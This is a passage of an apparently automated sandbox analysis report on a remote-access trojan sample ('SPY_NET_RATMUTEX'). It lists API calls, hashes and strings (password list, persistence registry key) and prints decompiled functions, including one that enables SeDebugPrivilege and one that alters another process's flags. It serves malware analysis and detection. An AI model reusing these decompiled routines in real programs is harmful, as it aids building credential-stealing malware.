                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000,00000000,240637B8,00000000,00000000,00000000,00000000), ref: 24056413
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000), ref: 24056570
                                      • Part of subcall function 24017668: CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                      • Part of subcall function 24017668: CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    • GetCurrentProcessId.KERNEL32(SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000), ref: 24056642
                                    • SetFileAttributesA.KERNEL32(00000000,00000002,00000000,00000080,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000), ref: 24056590
                                      • Part of subcall function 240178C8: CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                      • Part of subcall function 240178C8: SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    • Sleep.KERNEL32(000003E8,00000001,00000000,00000000,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC), ref: 240566EB
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000001,00000000,00000000,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000), ref: 240566F1
                                    • CloseHandle.KERNEL32(0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8), ref: 2405670F
                                    • CloseHandle.KERNEL32(00000000,0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000), ref: 2405671C
                                    • Sleep.KERNEL32(00002EE0,00000000,0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000), ref: 24056726
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Close$CreateHandle$Thread$ProcessTime$AttributesCurrentDeleteErrorLastSleep$ExitMutexOpenPriority
                                    • String ID: ####$PIDprocess$SOFTWARE\Microsoft\$SPY_NET_RATMUTEX$SQLite3.dll$Software\Microsoft\Active Setup\Installed Components\$XX--XX--XX.txt$[LogFile]$_PERSIST$_x_X_PASSWORDLIST_X_x_$logs.dat$njkvenknvjebcddlaknvfdvjkfdskv$open
                                    • API String ID: 2216801884-1096289745
                                    • Opcode ID: 2dbb1c664eee7f2a464c9adabf973a8edcffe0a5fb58d2e5190f5055ab857515
                                    • Instruction ID: 0eaa4b80a5128c934de95406a7d1a7ebec328d36d32247c2767844105b25d022
                                    • Opcode Fuzzy Hash: 2dbb1c664eee7f2a464c9adabf973a8edcffe0a5fb58d2e5190f5055ab857515
                                    • Instruction Fuzzy Hash: 11E13C747442049BFB11DFA8C890F5D77E5FB65708F508824B40AAB3A9CAB8EDC58B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240147A8, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E240147A8(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x240148ad);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E240145F0( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x24014a14, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(0x240148b4);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L2401128C();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L24011294();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L2401128C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L2401128C();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L2401128C();
											_t107 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}























                                    0x240147a9
                                    0x240147ab
                                    0x240147b3
                                    0x240147c4
                                    0x240147c9
                                    0x240147e2
                                    0x240147e9
                                    0x2401482b
                                    0x2401482d
                                    0x2401482e
                                    0x24014833
                                    0x24014836
                                    0x24014839
                                    0x2401484b
                                    0x2401486e
                                    0x2401488e
                                    0x2401488e
                                    0x24014892
                                    0x24014898
                                    0x2401489b
                                    0x2401489e
                                    0x240148ac
                                    0x240147eb
                                    0x24014800
                                    0x24014807
                                    0x00000000
                                    0x24014809
                                    0x2401481e
                                    0x24014825
                                    0x240148b4
                                    0x240148bc
                                    0x240148c3
                                    0x240148c4
                                    0x240148d7
                                    0x240148dc
                                    0x240148e5
                                    0x240148fb
                                    0x24014901
                                    0x24014902
                                    0x2401490f
                                    0x24014914
                                    0x24014913
                                    0x24014913
                                    0x24014923
                                    0x2401492b
                                    0x24014931
                                    0x24014936
                                    0x24014943
                                    0x24014947
                                    0x24014948
                                    0x24014949
                                    0x2401495e
                                    0x2401495e
                                    0x24014962
                                    0x2401497b
                                    0x2401497f
                                    0x24014980
                                    0x24014981
                                    0x24014996
                                    0x2401499a
                                    0x2401499c
                                    0x240149b1
                                    0x240149b5
                                    0x240149b6
                                    0x240149b7
                                    0x240149cc
                                    0x240149cc
                                    0x2401499a
                                    0x24014962
                                    0x2401492b
                                    0x240149d5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24014825
                                    0x24014807

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 240147C4
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240147E2
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 24014800
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 2401481E
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 24014867
                                    • RegQueryValueExA.ADVAPI32(?,24014A14,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001), ref: 24014885
                                    • RegCloseKey.ADVAPI32(?,240148B4,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240148A7
                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 240148C4
                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 240148D1
                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 240148D7
                                    • lstrlen.KERNEL32(00000000), ref: 24014902
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 24014949
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 24014959
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 24014981
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 24014991
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 240149B7
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 240149C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                    • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                    • API String ID: 1759228003-3917250287
                                    • Opcode ID: 42ee46547e8e3106cdda034bdc12a7bc57c1386e361a9b44a7258d1f1ec7aaf0
                                    • Instruction ID: 39d68f2d681f84a836ab47e9db7d39d4e42c15480b0cf85e97f51f47611cafd5
                                    • Opcode Fuzzy Hash: 42ee46547e8e3106cdda034bdc12a7bc57c1386e361a9b44a7258d1f1ec7aaf0
                                    • Instruction Fuzzy Hash: 57516375A0025C7AFB16C6A4CC85FEF7BEC9B08744F4001B1EA08E7195EA749FD48BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015B30, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E24015B30() {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				struct _OSVERSIONINFOA _v176;
				int _t20;
				intOrPtr _t42;
				intOrPtr _t44;

				_v176.dwOSVersionInfoSize = 0x94;
				_t20 = GetVersionExA( &_v176);
				if(_v176.dwPlatformId != 1) {
					_push(0x24015bf5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
					LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v28.Privileges)); // executed
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_v12 = 0;
					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12); // executed
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_v12 = 0;
					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12); // executed
					CloseHandle(_v8); // executed
					_pop(_t42);
					 *[fs:eax] = _t42;
					return 0;
				}
				return _t20;
			}











                                    0x24015b3c
                                    0x24015b4d
                                    0x24015b59
                                    0x24015b62
                                    0x24015b67
                                    0x24015b6a
                                    0x24015b79
                                    0x24015b8c
                                    0x24015b91
                                    0x24015b98
                                    0x24015ba1
                                    0x24015bb6
                                    0x24015bbb
                                    0x24015bc2
                                    0x24015bcb
                                    0x24015bdd
                                    0x24015be6
                                    0x24015bed
                                    0x24015bf0
                                    0x00000000
                                    0x24015bf0
                                    0x24015c05

                                    APIs
                                    • GetVersionExA.KERNEL32(00000094), ref: 24015B4D
                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,24015BF5,?,00000094), ref: 24015B73
                                    • OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,24015BF5,?,00000094), ref: 24015B79
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 24015B8C
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000,00000020,?,00000000,24015BF5,?,00000094), ref: 24015BB6
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,00000000,00000001,00000000,00000000,?,00000000,00000020,?,00000000), ref: 24015BDD
                                    • CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,00000000,00000001,00000000,00000000,?,00000000,00000020,?), ref: 24015BE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Token$AdjustPrivilegesProcess$CloseCurrentHandleLookupOpenPrivilegeValueVersion
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3222167619-2896544425
                                    • Opcode ID: a35bb3253e17ea2b179d723f62c4cbad68b68514c7fb13b5cc00fa9772f1d2ee
                                    • Instruction ID: 8e8d645fc21ffc544d601c472f01e925885e8c008af4b5905e0ef5136aaf7002
                                    • Opcode Fuzzy Hash: a35bb3253e17ea2b179d723f62c4cbad68b68514c7fb13b5cc00fa9772f1d2ee
                                    • Instruction Fuzzy Hash: 492103B1A00208FEFB10CBE5DD95FEFBBFCEB05704F504466E608E6190D6755A848BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015C1C, Relevance: 6.0, APIs: 4, Instructions: 37nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24015C1C(long __eax, void* __ecx) {
				void _v12;
				void _v28;
				long _t9;
				long _t11;
				signed int _t13;
				void* _t16;

				_t13 = 0;
				_t16 = OpenProcess(0x1f0fff, 0, __eax);
				if(_t16 != 0) {
					_t9 = NtQueryInformationProcess(_t16, 0x16,  &_v12, 4, 0); // executed
					if(_t9 < 0xc0000000) {
						_v28 = _v28 | 0x00000002;
						_v28 = _v28 | 0x00000008;
						_t11 = NtSetInformationProcess(_t16, 0x16,  &_v28, 4); // executed
						_t13 = 0 | _t11 - 0xc0000000 > 0x00000000;
						CloseHandle(_t16); // executed
					}
				}
				return _t13;
			}









                                    0x24015c1f
                                    0x24015c2e
                                    0x24015c32
                                    0x24015c40
                                    0x24015c4a
                                    0x24015c4c
                                    0x24015c50
                                    0x24015c5e
                                    0x24015c68
                                    0x24015c6c
                                    0x24015c6c
                                    0x24015c4a
                                    0x24015c76

                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,2405B980,?,2405641D,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04), ref: 24015C29
                                    • NtQueryInformationProcess.NTDLL(00000000,00000016,?,00000004,00000000), ref: 24015C40
                                    • NtSetInformationProcess.NTDLL(00000000,00000016,?,00000004), ref: 24015C5E
                                    • CloseHandle.KERNEL32(00000000,001F0FFF,00000000,00000000,?,2405B980,?,2405641D,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000), ref: 24015C6C
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Information$CloseHandleOpenQuery
                                    • String ID:
                                    • API String ID: 1636144130-0
                                    • Opcode ID: 8b0411576a1d48e6dbe04b4ade3104a22fdf87d3cfc7ab914bc7621fac0affc4
                                    • Instruction ID: 4a51a8b0da8681afbabb24b4b71017c90dbcf40be87158323073c3001d2d2b82
                                    • Opcode Fuzzy Hash: 8b0411576a1d48e6dbe04b4ade3104a22fdf87d3cfc7ab914bc7621fac0affc4
                                    • Instruction Fuzzy Hash: A2F0A0722C63143EF32159504C82FAF268C9F46BA8F400529F744DA080C2549AC842A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016C77, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 55%
                                    			E24016C77(char __eax, void* __ebx, void* __edx) {
				char _v8;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAA _v328;
				void* _t15;
				intOrPtr _t26;
				void* _t29;

				_v117 = _v117 + __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t29);
				_push(0x24016cd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t29 + 0xfffffebc;
				_t15 = FindFirstFileA(E24013534(_v8),  &_v328); // executed
				if(_t15 != 0xffffffff) {
					FindClose(_t15); // executed
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E24016CDC);
				return E24013088( &_v8);
			}









                                    0x24016c77
                                    0x24016c82
                                    0x24016c88
                                    0x24016c8f
                                    0x24016c90
                                    0x24016c95
                                    0x24016c98
                                    0x24016cad
                                    0x24016cb5
                                    0x24016cb8
                                    0x24016cbd
                                    0x24016cc1
                                    0x24016cc4
                                    0x24016cc7
                                    0x24016cd4

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: de3c709328871596a5b821b1a49aa237f6efc18f58b709d848d978373845b7ee
                                    • Instruction ID: 247e38473cecc72c6f9aff3f6e8617c1847afe5eee7a8d1161aac130ffc18d49
                                    • Opcode Fuzzy Hash: de3c709328871596a5b821b1a49aa237f6efc18f58b709d848d978373845b7ee
                                    • Instruction Fuzzy Hash: 05F02770904144AFEF01DBF8DDA1D9EBBFCEB197147910AB9E40DE2AA4E7355F409A10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016C78, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E24016C78(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				void* _t13;
				intOrPtr _t23;
				void* _t26;

				_v8 = __eax;
				E24013524(_v8);
				_push(_t26);
				_push(0x24016cd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26 + 0xfffffebc;
				_t13 = FindFirstFileA(E24013534(_v8),  &_v328); // executed
				if(_t13 != 0xffffffff) {
					FindClose(_t13); // executed
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E24016CDC);
				return E24013088( &_v8);
			}








                                    0x24016c82
                                    0x24016c88
                                    0x24016c8f
                                    0x24016c90
                                    0x24016c95
                                    0x24016c98
                                    0x24016cad
                                    0x24016cb5
                                    0x24016cb8
                                    0x24016cbd
                                    0x24016cc1
                                    0x24016cc4
                                    0x24016cc7
                                    0x24016cd4

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 062e76dc98e69d1e638f4d2610c82567f71eb4193208c084b94691b4f4dd1aae
                                    • Instruction ID: 36a4090f36d61ff8f122dbd567bd5eb26343aefb42f931a39bf7abb1124a4575
                                    • Opcode Fuzzy Hash: 062e76dc98e69d1e638f4d2610c82567f71eb4193208c084b94691b4f4dd1aae
                                    • Instruction Fuzzy Hash: F6F02770900104AFEB01EBF8DD9199EB7FCEB1871479109B5E40CE2664E7306F409A10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016910, Relevance: 1.6, APIs: 1, Instructions: 53timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E24016910(void* __eax, void* __ebx, void* __ecx) {
				struct _SYSTEMTIME _v20;
				char _v24;
				char _v28;
				void* _t33;
				void* _t34;
				intOrPtr _t41;
				void* _t47;

				_t34 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_t33 = __eax;
				_push(_t47);
				_push(0x2401699e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xffffffe8;
				GetLocalTime( &_v20);
				E240158BC( &_v24, _t34, 0, _v20.wHour & 0x0000ffff, 0);
				if(E2401333C(_v24) != 1) {
					E240158BC(_t33, _t34, 0, _v20.wHour & 0x0000ffff, 0);
				} else {
					E240158BC( &_v28, _t34, 0, _v20.wHour & 0x0000ffff, 0); // executed
					E24013388(_t33, _v28, 0x240169b4);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E240169A5);
				return E240130AC( &_v28, 2);
			}










                                    0x24016910
                                    0x24016919
                                    0x2401691c
                                    0x2401691f
                                    0x24016923
                                    0x24016924
                                    0x24016929
                                    0x2401692c
                                    0x24016933
                                    0x24016943
                                    0x24016951
                                    0x2401697e
                                    0x24016953
                                    0x2401695e
                                    0x2401696d
                                    0x2401696d
                                    0x24016985
                                    0x24016988
                                    0x2401698b
                                    0x2401699d

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,2401699E,?,00000000), ref: 24016933
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: 924c4cdced7f427e2dd774ea5a0a08d5c92b05e449f30683f4ad69eab968a7f6
                                    • Instruction ID: d92e4c93ec7361fccff17d09113173e5b526b34984a92f08cf553826bfaabc06
                                    • Opcode Fuzzy Hash: 924c4cdced7f427e2dd774ea5a0a08d5c92b05e449f30683f4ad69eab968a7f6
                                    • Instruction Fuzzy Hash: 490144B0A042095BFB05DBA5CC519BFB6FDEFC8714B418439A408E6254E9349E808561
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24018CD0, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E24018CD0(int __eax, char __ecx, int __edx) {
				char _v16;
				int _t4;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				_t4 = GetLocaleInfoA(__eax, __edx,  &_v16, 2); // executed
				if(_t4 <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}







                                    0x24018cd3
                                    0x24018cd4
                                    0x24018ce3
                                    0x24018cea
                                    0x24018cf1
                                    0x24018cec
                                    0x24018cec
                                    0x24018cec
                                    0x24018cf7

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,24018D23,00000000,24018D66,?,?,00000000,00000000), ref: 24018CE3
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: c0a5c38b77294cd5bc0105dacaac811761fc0667ac39b8f869ab3184c1b78c3f
                                    • Instruction ID: aa1f27ab185497e9081335c649769818a4f56c2750f4d0ddfdf6f1f28fc821f9
                                    • Opcode Fuzzy Hash: c0a5c38b77294cd5bc0105dacaac811761fc0667ac39b8f869ab3184c1b78c3f
                                    • Instruction Fuzzy Hash: B3D05E7731E2903AB210416A2D84EBB4ADCCBCA6A0F00407ABA4CC6200D2108D4AA3BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240384FC, Relevance: 46.1, APIs: 13, Strings: 13, Instructions: 591sleepfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 80%
                                    			E240384FC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				void* _t139;
				intOrPtr* _t140;
				void* _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t155;
				void** _t171;
				intOrPtr* _t181;
				void** _t182;
				intOrPtr* _t194;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr _t213;
				intOrPtr _t216;
				intOrPtr _t237;
				intOrPtr _t286;
				intOrPtr _t289;
				intOrPtr* _t298;
				intOrPtr* _t299;
				intOrPtr _t302;
				intOrPtr* _t304;
				intOrPtr _t320;
				void* _t322;
				intOrPtr* _t355;
				char* _t358;
				intOrPtr* _t359;
				intOrPtr* _t371;
				intOrPtr* _t376;
				CHAR* _t378;
				int _t381;
				intOrPtr* _t384;
				void* _t386;
				char* _t387;
				char* _t388;
				void* _t394;
				void* _t399;
				intOrPtr* _t448;
				void* _t452;
				intOrPtr _t453;
				intOrPtr _t454;
				intOrPtr _t458;
				intOrPtr* _t464;
				intOrPtr* _t495;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t507;
				intOrPtr _t522;
				intOrPtr _t523;
				void* _t556;

				_t556 = __fp0;
				_t520 = __esi;
				_t519 = __edi;
				_t393 = __ebx;
				_t522 = _t523;
				_t394 = 0xc;
				goto L1;
				do {
					L4:
					_t140 =  *0x2405ac40; // 0x2405b970
					_t142 = E24016C78( *_t140, _t393, _t525); // executed
					if(_t142 == 0) {
						_t388 =  *0x2405ab48; // 0x240570d4
						 *_t388 = 0;
